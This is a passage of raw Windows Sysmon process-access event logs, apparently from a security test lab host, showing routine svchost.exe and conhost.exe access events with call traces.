07:53:28.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2172,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2173,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2174,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2175,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2176,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2177,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2178,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2179,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.767\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-00109CE10300}\r\nTargetProcessId: 3920\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.767","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-00109CE10300}","TargetProcessId":"3920","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
